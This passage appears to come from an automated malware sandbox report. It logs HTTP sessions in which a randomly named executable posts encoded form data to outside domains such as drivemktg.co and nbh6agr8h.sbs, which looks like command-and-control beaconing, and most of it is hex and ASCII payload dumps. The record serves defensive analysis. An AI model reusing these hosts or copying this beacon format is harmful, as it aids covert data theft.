                                                          Data Ascii: C"39\f|8cNmL}dX{#F(" Kmw:Vj!nq6mP"H|'@6;3(Yi\x:NEu 0J)'N{-C>:[aPCZ*M|X]KxiLe6=
                                                          Sep 11, 2024 22:03:37.143942118 CEST1236INData Raw: 26 60 02 45 04 0c 15 ac be 65 d8 f7 5b 90 75 3b 6e 5c e8 b6 1d 02 50 15 38 9e 6e 4a 44 fc 6d 4c 99 77 0e c7 38 de f7 71 bc 5a 48 43 30 8e 7b b4 fe 79 38 f6 1a 8d 8b e3 f0 ff a0 3d 64 64 b9 71 79 b1 9f c5 eb 8c 9c 25 eb dd 3b 64 1d 9f 65 64 9d 9c
                                                          Data Ascii: &`Ee[u;n\P8nJDmLw8qZHC0{y8=ddqy%;dedJ|uuFVA|(JDdv"/>4'5&QyY7QWy)3C.hU9yV<qik'KQjE0>k=RE^
                                                          Sep 11, 2024 22:03:37.143956900 CEST1236INData Raw: a9 c6 29 ae a5 28 3b 35 03 86 1b d7 6b ea 66 6b d3 f4 3c a8 05 0d bb 5c fb 41 f9 75 06 66 64 75 3f 7f e9 36 12 02 d1 f5 3f 9a 56 63 a5 b3 d4 0b 4c b7 4f f5 d4 9e 80 32 d5 eb e5 3c 00 78 d8 ce 6a 5d 5b 50 2f e7 ce ea 65 35 78 da 57 e0 e8 95 db 92
                                                          Data Ascii: )(;5kfk<\Aufdu?6?VcLO2<xj][P/e5xWH@e{ZsHHI,^}v=zoZz8)T>j4Nepu?'MQ/Mg8S<!zc1"vyOE,g]lucNj%fCS*
                                                          Sep 11, 2024 22:03:37.143982887 CEST1236INData Raw: 3c 63 19 0b cb 13 91 c3 5c 5d ed 1f 41 56 fb 47 d4 b8 6d d6 21 04 82 05 b3 eb e6 51 b5 96 34 fa be 5e 97 2d ea 6a ff d8 8e 2e 82 ad 96 a6 db a7 f8 87 f4 a8 b0 d6 03 08 14 43 5a f9 34 49 9a 10 4d 1d 4d 80 96 cf 92 64 09 b1 d4 b1 04 58 f9 3c 49 9e
                                                          Data Ascii: <c\]AVGm!Q4^-j.CZ4IMMdX<IOO/D2ILL@''.O /HHH]SEcB*"P(:SHA?V"2y!QQ. dL]eESu^q)*aRWMc,?yA`/}
                                                          Sep 11, 2024 22:03:37.143997908 CEST1236INData Raw: e5 cc 80 3c f1 37 23 00 b5 3f 3a 74 1f a6 71 ec 1f 0c c9 18 2c 49 8c 40 b4 b5 1f ef 6e bf 24 23 27 ad ff 7d 98 46 2c 4d 47 b7 39 50 6f d7 35 85 0d c1 38 cf ea bb d6 c4 5f be dd 20 59 d6 87 76 68 a6 91 7f bb 7b 7b 43 43 5c 35 be f4 a1 1d d3 08 8d
                                                          Data Ascii: <7#?:tq,I@n$#'}F,MG9Po58_ Yvh{{CC\5R9jU6!#OmJ5N>(ZQcxdr:S/%Q3z-Xxw%~jEoo"9!}_W=fE'O2X:KknfD?@39C
                                                          Sep 11, 2024 22:03:37.144015074 CEST1236INData Raw: 8b 21 50 cf 3c 61 19 95 25 4d f1 10 5c d5 01 cc 37 43 7f 2e f2 a2 13 8d 91 a2 13 db 6f c1 d6 29 2c 69 3b b7 c8 f2 52 3e f8 10 30 47 c4 79 99 e1 ac 14 25 7b 24 37 27 9b bb 1f 6e cd 59 7c 10 ca a6 96 3e d8 3a da 0b 1e 1f 12 f2 03 92 da 72 6e 5d dc
                                                          Data Ascii: !P<a%M\7C.o),i;R>0Gy%{$7'nY|>:rn]nr)66?og`&MatTsp9"m8(qR/W")%o?7T*TUD|hpn]dnfg'o0=0qbxzA
                                                          Sep 11, 2024 22:03:37.144028902 CEST1089INData Raw: 36 4b b6 5e f5 bd aa ad 16 42 a4 11 d8 49 25 ff 62 56 3d 9e 92 ab 17 1b f0 66 b0 91 35 92 d1 43 d5 f1 01 ca 59 c4 9b 66 8f a2 5e 70 b1 d6 99 b9 db 61 1b ed dd 36 4c dd 0f b7 06 01 5f c7 fe b7 eb 87 5f de e7 af 7b 83 6c b5 55 98 b8 0d 95 db f9 47
                                                          Data Ascii: 6K^BI%bV=f5CYf^pa6L__{lUG$Wrz\Ut(H.BXPp[:QPjcxcwl,:dvhCu(wp`Na~JOSQ-\S,a*Kh]"ajKZf%$


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          11192.168.2.1049719193.108.130.23804832C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 11, 2024 22:03:38.624823093 CEST1759OUTPOST /6iyv/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.drivemktg.co
                                                          Origin: http://www.drivemktg.co
                                                          Content-Length: 1233
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.drivemktg.co/6iyv/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 62 46 47 58 47 54 64 58 3d 64 57 49 44 6d 61 46 4d 4a 64 7a 46 62 56 50 56 66 72 6f 6e 4f 6f 39 4a 77 6b 2b 2b 4d 6b 78 72 2b 74 67 62 6b 5a 39 79 42 57 78 75 76 36 46 6d 56 5a 78 34 52 69 2b 42 33 5a 38 59 69 55 4d 33 5a 62 46 66 4c 63 41 32 41 75 59 6e 64 6c 65 74 6b 56 39 31 53 32 4e 4e 6e 65 42 5a 2f 2f 54 66 6a 2f 70 38 6f 56 51 44 69 39 57 51 68 47 77 2b 4a 6c 6f 5a 35 34 38 73 52 31 37 70 6e 69 41 7a 79 38 59 54 59 58 41 36 4e 44 4a 31 6d 65 48 6c 4e 51 45 64 64 6f 52 79 4e 66 4d 57 6e 36 74 4c 6c 74 33 36 69 66 34 6a 46 67 34 74 6b 4b 69 30 54 7a 77 37 64 45 39 4f 6d 39 77 78 78 66 30 32 47 76 55 43 77 6e 67 72 47 2f 31 43 2b 39 45 75 6a 70 5a 38 57 2f 65 6f 56 59 52 46 31 49 54 67 32 52 78 77 64 64 4e 43 39 7a 59 46 73 73 34 38 69 38 65 4d 4e 30 4f 50 42 37 65 50 34 4b 64 5a 5a 45 42 6d 4a 53 6b 71 75 6b 49 42 71 39 72 56 2f 30 30 4d 31 6f 69 54 4d 55 67 63 76 6a 69 30 62 6a 70 4f 32 70 72 61 50 45 56 4b 6c 2f 52 66 43 36 64 58 33 7a 39 64 2b 41 6b 61 6a 69 5a 64 56 75 54 5a 6d 61 66 6c 30 [TRUNCATED]
                                                          Data Ascii: bFGXGTdX=dWIDmaFMJdzFbVPVfronOo9Jwk++Mkxr+tgbkZ9yBWxuv6FmVZx4Ri+B3Z8YiUM3ZbFfLcA2AuYndletkV91S2NNneBZ//Tfj/p8oVQDi9WQhGw+JloZ548sR17pniAzy8YTYXA6NDJ1meHlNQEddoRyNfMWn6tLlt36if4jFg4tkKi0Tzw7dE9Om9wxxf02GvUCwngrG/1C+9EujpZ8W/eoVYRF1ITg2RxwddNC9zYFss48i8eMN0OPB7eP4KdZZEBmJSkqukIBq9rV/00M1oiTMUgcvji0bjpO2praPEVKl/RfC6dX3z9d+AkajiZdVuTZmafl0qYDc0q8Lk/NiFZTkMHbKtgeHvdRip+v0xlsxx1aljUG9wUujsusT06bSXCTwOMcZ0mTtOCpCiYnekoVqN5cmHbm0t9zz8ICn3R6nnaOCc+THmgD7B86napQqYShyYQdiwpvnN6/jRX/Ab8PaZPrWM/QBRnWZDGsw+xYOP/pyDPjpqii8I7+H79PW7ixZ2P7hASXv8Wxv961G2n1At6n3IImuzYobLJ8hb6wQytwG4K6ydnm0Q1r5jTrt14+jPZiZHfBbV2vAPp2xS6Q0qed3OtjU3ysUIm71JWlRqw37jLowuLMPRWKtd0QyJdIjNVDOG0HZeKp4/lyk48KkG2RejNW/x6UyOkttrMCplqWBYc+FqD6lg2xAxpqrDa6KM88xRAnmEX2igljlOFbQo8CgpxiqLZ9+bF1sYcayyOgMa+ocddrSi6Fn4I2LLx5lGq3io+kNPGeOH2Kjga4I2DUgNGT1fvRbcyXt9gMkthb+aTYx66ifl58jvTpgyjEhz1m9irci02HXq4dJFN7mHIIxnDKI/pWPHEaqrgp+rsa+4K67MmLQOEViZWsTZUWSoeR5PjGszqZ8w0gn1mS2c9uEEDJIzfnQIYZ8TGrvLERzL4xMJHqPaAo6kT20LctXenqU6caIoo9SkRzGpwXHi90om4fEEjZ7lfP0q8 [TRUNCATED]
                                                          Sep 11, 2024 22:03:39.725352049 CEST1236INHTTP/1.1 200 OK
                                                          Connection: close
                                                          x-powered-by: PHP/8.1.29
                                                          x-litespeed-tag: fae_HTTP.200
                                                          content-type: text/html; charset=UTF-8
                                                          link: <https://drivemktg.co/wp-json/>; rel="https://api.w.org/"
                                                          link: <https://drivemktg.co/wp-json/wp/v2/pages/10>; rel="alternate"; title="JSON"; type="application/json"
                                                          link: <https://drivemktg.co/?p=10>; rel=shortlink
                                                          x-litespeed-cache-control: no-cache
                                                          cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                          transfer-encoding: chunked
                                                          content-encoding: br
                                                          vary: Accept-Encoding,User-Agent
                                                          date: Wed, 11 Sep 2024 20:03:16 GMT
                                                          server: LiteSpeed
                                                          Data Raw: 32 33 62 62 0d 0a 30 b4 2d a2 aa d6 43 46 a4 26 f5 00 68 a4 2c 9c bf 7f 84 0e 9f f3 fe db 2f ab ef ce cf 17 61 ab 0c 4c 23 9a a4 af 35 c3 1c d7 69 d7 16 ea d3 d0 ad e0 c2 33 47 d9 4e be aa fe 77 f3 f3 85 a3 4f 2f 62 1f 40 61 73 28 76 86 33 ea 66 38 8d 3b b6 0e 24 41 0a 36 48 a2 00 28 51 d6 f9 ff f7 97 e6 39 5b 22 9e 3e e5 6e 51 06 48 30 33 c6 32 08 ed 76 09 df 07 e7 64 46 52 61 2a 44 85 64 bb 10 15 e4 02 ef bb f7 c1 cc 9f 2f 5e 90 65 ad 11 b5 c4 d4 a6 4c 6d 19 02 00 55 da 34 c5 68 42 0a 70 c5 50 e5 6c d1 36 79 0c 67 3d c3 40 24 8c 95 6e cb 98 d6 db de da af 90 0d 22 44 50 1f c3 a1 7b a6 35 0b c4 98 c2 6f 53 08 58 f0 c1 ec fe 16 bb b6 f7 aa a3 2b 0a 36 fe fe 75 1e 87 f3 25 84 90 fb 1d e0 7a f2 b7 05 40 45 17 fe 2e ad 3f 76 ad b1 b7 c4 43 ab 68 ef 5d 6d 5a 18 d4 fa b1 6a ba be 91 ce 37 c9 a1 b6 c9 72 e9 f5 cc 19 db 14 ba bc dd 3f 8a ca 9b 1d 74 b7 d8 c8 d2 25 87 ae f5 7d 29 fb 6d 4f 1f cc a4 ea 51 16 ad b6 b7 24 fa e7 6a b5 5c 6e c8 33 6f 76 40 de 6b 7f 0b 68 6c 43 84 6b 97 c8 a7 ad 69 4d df 1b 0b a1 [TRUNCATED]
                                                          Data Ascii: 23bb0-CF&h,/aL#5i3GNwO/b@as(v3f8;$A6H(Q9[">nQH032vdFRa*Dd/^eLmU4hBpPl6yg=@$n"DP{5oSX+6u%z@E.?vCh]mZj7r?t%})mOQ$j\n3ov@khlCkiM3s\,+l!6n ^Pg$folV,Y<L<FlLgBT6#/*GJ(NSu`1 $2l:wcM f5O$tY(OJ!O|dy.Sr'TP8 4AYv1#KHKgK0eC5ZdHCCZdgw+:MYrob"|[eFX>
                                                          Sep 11, 2024 22:03:39.725377083 CEST1236INData Raw: 27 4e 04 01 1b bb 85 49 c9 80 8f e8 8f f6 f5 a8 c6 e6 11 97 fa 06 01 43 06 22 33 aa ca 92 fc 39 5c f6 a6 f7 fd f0 b1 66 7c da 04 08 c1 38 fb 15 9d d7 0d c8 00 f8 1a a1 63 4e bc f9 fa f1 83 0c e8 8d 6d 4c 7d 64 c8 f9 94 b6 d7 8f d3 84 c2 58 7b 06
                                                          Data Ascii: 'NIC"39\f|8cNmL}dX{#F(" Kmw:Vj!nq6mP"H|'@6;3(Yi\x:NEu 0J)'N{-C>:[aPCZ*M|X]Kxi
                                                          Sep 11, 2024 22:03:39.725387096 CEST1236INData Raw: ed ec 10 07 5c b3 1a 63 52 86 90 54 26 60 02 45 04 0c 15 ac be 65 d8 f7 5b 90 75 3b 6e 5c e8 b6 1d 02 50 15 38 9e 6e 4a 44 fc 6d 4c 99 77 0e c7 38 de f7 71 bc 5a 48 43 30 8e 7b b4 fe 79 38 f6 1a 8d 8b e3 f0 ff a0 3d 64 64 b9 71 79 b1 9f c5 eb 8c
                                                          Data Ascii: \cRT&`Ee[u;n\P8nJDmLw8qZHC0{y8=ddqy%;dedJ|uuFVA|(JDdv"/>4'5&QyY7QWy)3C.hU9yV<qik'KQjE0>
                                                          Sep 11, 2024 22:03:39.725397110 CEST1236INData Raw: 0d a2 70 c8 c3 de 0b 96 4a 52 dc 36 a9 c6 29 ae a5 28 3b 35 03 86 1b d7 6b ea 66 6b d3 f4 3c a8 05 0d bb 5c fb 41 f9 75 06 66 64 75 3f 7f e9 36 12 02 d1 f5 3f 9a 56 63 a5 b3 d4 0b 4c b7 4f f5 d4 9e 80 32 d5 eb e5 3c 00 78 d8 ce 6a 5d 5b 50 2f e7
                                                          Data Ascii: pJR6)(;5kfk<\Aufdu?6?VcLO2<xj][P/e5xWH@e{ZsHHI,^}v=zoZz8)T>j4Nepu?'MQ/Mg8S<!zc1"vyOE,g]lucNj%
                                                          Sep 11, 2024 22:03:39.725406885 CEST1236INData Raw: d9 c9 ae 28 b6 90 39 3f 65 09 6a e4 3c 63 19 0b cb 13 91 c3 5c 5d ed 1f 41 56 fb 47 d4 b8 6d d6 21 04 82 05 b3 eb e6 51 b5 96 34 fa be 5e 97 2d ea 6a ff d8 8e 2e 82 ad 96 a6 db a7 f8 87 f4 a8 b0 d6 03 08 14 43 5a f9 34 49 9a 10 4d 1d 4d 80 96 cf
                                                          Data Ascii: (9?ej<c\]AVGm!Q4^-j.CZ4IMMdX<IOO/D2ILL@''.O /HHH]SEcB*"P(:SHA?V"2y!QQ. dL]eESu^q)*aRWMc,?y
                                                          Sep 11, 2024 22:03:39.725416899 CEST1236INData Raw: 9f a7 a7 be b0 d1 30 47 6a 9c 9f 1a e5 cc 80 3c f1 37 23 00 b5 3f 3a 74 1f a6 71 ec 1f 0c c9 18 2c 49 8c 40 b4 b5 1f ef 6e bf 24 23 27 ad ff 7d 98 46 2c 4d 47 b7 39 50 6f d7 35 85 0d c1 38 cf ea bb d6 c4 5f be dd 20 59 d6 87 76 68 a6 91 7f bb 7b
                                                          Data Ascii: 0Gj<7#?:tq,I@n$#'}F,MG9Po58_ Yvh{{CC\5R9jU6!#OmJ5N>(ZQcxdr:S/%Q3z-Xxw%~jEoo"9!}_W=fE'O2X:KknfD
                                                          Sep 11, 2024 22:03:39.725428104 CEST1236INData Raw: 86 20 11 93 fe 6b 27 1c ff fb ed d4 8b 21 50 cf 3c 61 19 95 25 4d f1 10 5c d5 01 cc 37 43 7f 2e f2 a2 13 8d 91 a2 13 db 6f c1 d6 29 2c 69 3b b7 c8 f2 52 3e f8 10 30 47 c4 79 99 e1 ac 14 25 7b 24 37 27 9b bb 1f 6e cd 59 7c 10 ca a6 96 3e d8 3a da
                                                          Data Ascii: k'!P<a%M\7C.o),i;R>0Gy%{$7'nY|>:rn]nr)66?og`&MatTsp9"m8(qR/W")%o?7T*TUD|hpn]dnfg'o0=0qbx
                                                          Sep 11, 2024 22:03:39.725442886 CEST1103INData Raw: a1 4f 12 47 2f e3 5e c8 27 34 ff 72 36 4b b6 5e f5 bd aa ad 16 42 a4 11 d8 49 25 ff 62 56 3d 9e 92 ab 17 1b f0 66 b0 91 35 92 d1 43 d5 f1 01 ca 59 c4 9b 66 8f a2 5e 70 b1 d6 99 b9 db 61 1b ed dd 36 4c dd 0f b7 06 01 5f c7 fe b7 eb 87 5f de e7 af
                                                          Data Ascii: OG/^'4r6K^BI%bV=f5CYf^pa6L__{lUG$Wrz\Ut(H.BXPp[:QPjcxcwl,:dvhCu(wp`Na~JOSQ-\S,a*Kh]"ajKZ
                                                          Sep 11, 2024 22:03:39.725817919 CEST11INData Raw: 31 0d 0a 03 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 10


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          12192.168.2.1049720193.108.130.23804832C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 11, 2024 22:03:41.153753996 CEST459OUTGET /6iyv/?bFGXGTdX=QUgjltNnPM7fQ1+0bKwVMbQ54EaLfCpy+OUhi4BxQU9uhqAfHapQDk2a3aAnmDcuDNg9UdkAVeopJ3fRxVhQVT9mj+0/2IqVm/xmg09egO+B+lk9Mw==&M87d=RDddFbF8 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-us
                                                          Host: www.drivemktg.co
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Sep 11, 2024 22:03:42.170047998 CEST440INHTTP/1.1 301 Moved Permanently
                                                          Connection: close
                                                          x-powered-by: PHP/8.1.29
                                                          content-type: text/html; charset=UTF-8
                                                          x-redirect-by: WordPress
                                                          location: http://drivemktg.co/6iyv/?bFGXGTdX=QUgjltNnPM7fQ1+0bKwVMbQ54EaLfCpy+OUhi4BxQU9uhqAfHapQDk2a3aAnmDcuDNg9UdkAVeopJ3fRxVhQVT9mj+0/2IqVm/xmg09egO+B+lk9Mw==&M87d=RDddFbF8
                                                          x-litespeed-cache: miss
                                                          content-length: 0
                                                          date: Wed, 11 Sep 2024 20:03:18 GMT
                                                          server: LiteSpeed
                                                          vary: User-Agent


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          13192.168.2.104972147.239.13.172804832C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 11, 2024 22:03:47.902614117 CEST725OUTPOST /bqpw/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.nbh6agr8h.sbs
                                                          Origin: http://www.nbh6agr8h.sbs
                                                          Content-Length: 197
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.nbh6agr8h.sbs/bqpw/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 62 46 47 58 47 54 64 58 3d 32 67 54 47 6a 34 77 77 55 63 62 75 4f 6d 47 55 76 44 74 51 66 6b 70 4d 30 65 41 53 6b 7a 38 74 48 2b 45 6a 4c 48 37 61 58 4b 62 4a 62 34 44 56 75 42 49 55 4c 5a 39 50 39 79 44 4f 51 67 43 4d 2b 68 50 4c 63 65 70 72 78 56 4b 6f 53 35 35 66 54 6c 31 2f 69 55 77 49 34 6d 69 2b 65 61 37 66 37 79 42 79 6b 46 6a 46 79 68 7a 55 38 56 37 76 34 76 31 55 42 7a 6d 38 6e 6b 43 65 6a 6a 74 35 45 63 35 50 43 34 78 57 46 4b 5a 30 59 4d 53 67 4f 52 4b 49 63 41 31 53 64 65 62 4d 7a 76 64 47 34 61 63 35 59 6a 30 50 45 6d 53 39 6a 41 63 35 45 6a 56 66 33 4c 72 6d 4c 68 47 68
                                                          Data Ascii: bFGXGTdX=2gTGj4wwUcbuOmGUvDtQfkpM0eASkz8tH+EjLH7aXKbJb4DVuBIULZ9P9yDOQgCM+hPLceprxVKoS55fTl1/iUwI4mi+ea7f7yBykFjFyhzU8V7v4v1UBzm8nkCejjt5Ec5PC4xWFKZ0YMSgORKIcA1SdebMzvdG4ac5Yj0PEmS9jAc5EjVf3LrmLhGh
                                                          Sep 11, 2024 22:03:48.831069946 CEST165INHTTP/1.1 405 Not Allowed
                                                          Server: nginx
                                                          Date: Wed, 11 Sep 2024 20:03:48 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 2
                                                          Connection: close
                                                          ETag: "660279db-2"
                                                          Data Raw: 31 0a
                                                          Data Ascii: 1


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          14192.168.2.104972247.239.13.172804832C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 11, 2024 22:03:50.434772968 CEST749OUTPOST /bqpw/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.nbh6agr8h.sbs
                                                          Origin: http://www.nbh6agr8h.sbs
                                                          Content-Length: 221
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.nbh6agr8h.sbs/bqpw/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 62 46 47 58 47 54 64 58 3d 32 67 54 47 6a 34 77 77 55 63 62 75 50 43 36 55 6a 43 74 51 4f 55 70 44 36 2b 41 53 39 6a 39 6b 48 2b 34 6a 4c 43 43 66 55 34 50 4a 62 59 54 56 76 44 67 55 4b 5a 39 50 32 53 44 48 55 67 43 44 2b 67 7a 70 63 66 35 72 78 56 75 6f 53 34 4a 66 54 57 4d 70 6a 45 77 4b 74 32 69 77 54 36 37 66 37 79 42 79 6b 42 50 76 79 67 62 55 38 6c 72 76 34 4f 31 62 43 7a 6d 39 75 45 43 65 6e 6a 74 31 45 63 35 39 43 35 74 77 46 4a 78 30 59 4e 4f 67 4b 51 4b 4c 53 41 30 5a 5a 65 62 5a 32 75 45 64 30 76 6b 53 66 46 34 69 52 6c 4c 66 70 42 39 2b 56 79 30 49 6b 38 33 6f 46 6e 7a 4c 35 65 47 6b 38 61 4a 33 4c 6c 50 69 33 74 70 46 6c 53 54 4b 72 41 3d 3d
                                                          Data Ascii: bFGXGTdX=2gTGj4wwUcbuPC6UjCtQOUpD6+AS9j9kH+4jLCCfU4PJbYTVvDgUKZ9P2SDHUgCD+gzpcf5rxVuoS4JfTWMpjEwKt2iwT67f7yBykBPvygbU8lrv4O1bCzm9uECenjt1Ec59C5twFJx0YNOgKQKLSA0ZZebZ2uEd0vkSfF4iRlLfpB9+Vy0Ik83oFnzL5eGk8aJ3LlPi3tpFlSTKrA==
                                                          Sep 11, 2024 22:03:51.334691048 CEST165INHTTP/1.1 405 Not Allowed
                                                          Server: nginx
                                                          Date: Wed, 11 Sep 2024 20:03:51 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 2
                                                          Connection: close
                                                          ETag: "660279db-2"
                                                          Data Raw: 31 0a
                                                          Data Ascii: 1


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          15192.168.2.104972347.239.13.172804832C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 11, 2024 22:03:52.969449043 CEST1762OUTPOST /bqpw/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.nbh6agr8h.sbs
                                                          Origin: http://www.nbh6agr8h.sbs
                                                          Content-Length: 1233
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.nbh6agr8h.sbs/bqpw/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 62 46 47 58 47 54 64 58 3d 32 67 54 47 6a 34 77 77 55 63 62 75 50 43 36 55 6a 43 74 51 4f 55 70 44 36 2b 41 53 39 6a 39 6b 48 2b 34 6a 4c 43 43 66 55 34 33 4a 62 4c 4c 56 75 6b 55 55 51 5a 39 50 31 53 44 4b 55 67 43 65 2b 67 72 74 63 61 68 64 78 58 6d 6f 54 61 52 66 43 7a 67 70 71 45 77 4b 31 47 69 39 65 61 36 66 37 7a 74 2b 6b 46 76 76 79 67 62 55 38 6e 6a 76 2b 66 31 62 4f 54 6d 38 6e 6b 43 61 6a 6a 74 52 45 63 41 49 43 35 35 47 46 5a 52 30 59 74 65 67 49 47 57 4c 61 41 30 62 56 2b 61 63 32 75 34 34 30 72 45 65 66 46 6b 4d 52 6c 44 66 6f 41 34 44 4b 43 34 4e 34 2f 6e 33 48 58 54 65 30 70 4b 4d 34 35 49 30 45 6e 76 5a 73 38 77 73 6d 77 4f 59 32 76 33 6e 56 46 6a 66 48 41 39 45 76 72 55 68 2b 6f 70 77 35 35 62 5a 55 39 51 4a 35 6a 63 78 4b 41 53 4a 48 51 55 58 79 47 52 31 64 6c 36 78 42 6b 2f 73 73 38 37 41 6c 31 6b 79 70 48 52 45 6a 48 30 72 72 4b 48 30 4d 6c 4a 43 57 50 56 33 75 30 76 4f 79 38 64 32 74 69 4a 54 38 55 50 70 43 6f 31 32 48 49 58 37 33 6a 52 73 41 58 30 63 2f 49 72 6a 51 61 6a 4d 51 [TRUNCATED]
                                                          Data Ascii: bFGXGTdX=2gTGj4wwUcbuPC6UjCtQOUpD6+AS9j9kH+4jLCCfU43JbLLVukUUQZ9P1SDKUgCe+grtcahdxXmoTaRfCzgpqEwK1Gi9ea6f7zt+kFvvygbU8njv+f1bOTm8nkCajjtREcAIC55GFZR0YtegIGWLaA0bV+ac2u440rEefFkMRlDfoA4DKC4N4/n3HXTe0pKM45I0EnvZs8wsmwOY2v3nVFjfHA9EvrUh+opw55bZU9QJ5jcxKASJHQUXyGR1dl6xBk/ss87Al1kypHREjH0rrKH0MlJCWPV3u0vOy8d2tiJT8UPpCo12HIX73jRsAX0c/IrjQajMQ8Db69qg+/3kS00tbZSB4FbJJTKr1zm9whWFYP2L9XibvLGD/XSGweQl5NROhMrXCLzq51gu5Jz6Q0h5Opuw1cYcMCluWIRghC3eQ2gvsQGQ+wgk2oFDgNUudJKWM3FCl69lx4am7sFlZVp7sNsKeos5Y+ojJNdkozjl+NJhwr791ij34dxR/flZeojvUb+BCFWUvlxUZpUm2BrKkIfZZ8ey8u6LRFYy1BHit4oN6HCiSbiQjFBhC+xwLiHBon6MOXwGnWlroS4p9xkeiQ0n5azzH9ocUAb99oJbNmHO1bDflruC3OzWbxn7Dl3LnCc54TGKpso+j8cm8RQllZMxHwc5vQe7DGHqgZtrmwJJDsPQ4RRr0NIK+H9u/jtH3CoKm9aTNPBS71ukFPE5J5nUj7kAhj8AVo8t2CAwA4kyN5rZ3PCnfxuTfkiylP5XorV8GDZ47Qy0S/ef1fxNy6Af8ug+ymd6nxAh0BlhDI2r4Nvdc6sLl8qO/Fd40nyHSYLThIj77o77E/OBUBvsSG0eMdmKk6GwI5AELTpwPYjpT0VuTmQ8Y39JXla0splpHUlxdvxtc5esSRp3Ja6aJjJ5tBuiAN8Pcn3bFrGefXLUHSqYAJGyueyRXXvwVdluXPeJY/FFVqao7bLRo5A6RW8b7EL7dElFeLWIKqZ [TRUNCATED]
                                                          Sep 11, 2024 22:03:53.999375105 CEST165INHTTP/1.1 405 Not Allowed
                                                          Server: nginx
                                                          Date: Wed, 11 Sep 2024 20:03:53 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 2
                                                          Connection: close
                                                          ETag: "660279db-2"
                                                          Data Raw: 31 0a
                                                          Data Ascii: 1


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          16192.168.2.104972447.239.13.172804832C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 11, 2024 22:03:55.497061014 CEST460OUTGET /bqpw/?bFGXGTdX=7i7mgMVoUdn3K3H4hxR2Z2sx7NMDmz1WBuojPjrSQrb0L6/7xSQOb69NgDz1ThGB8kqobNNV7CaIX5kMC3tpqGoJwELsf5+TzHoCpSOUthnHuH68iQ==&M87d=RDddFbF8 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-us
                                                          Host: www.nbh6agr8h.sbs
                                                          Connection: close
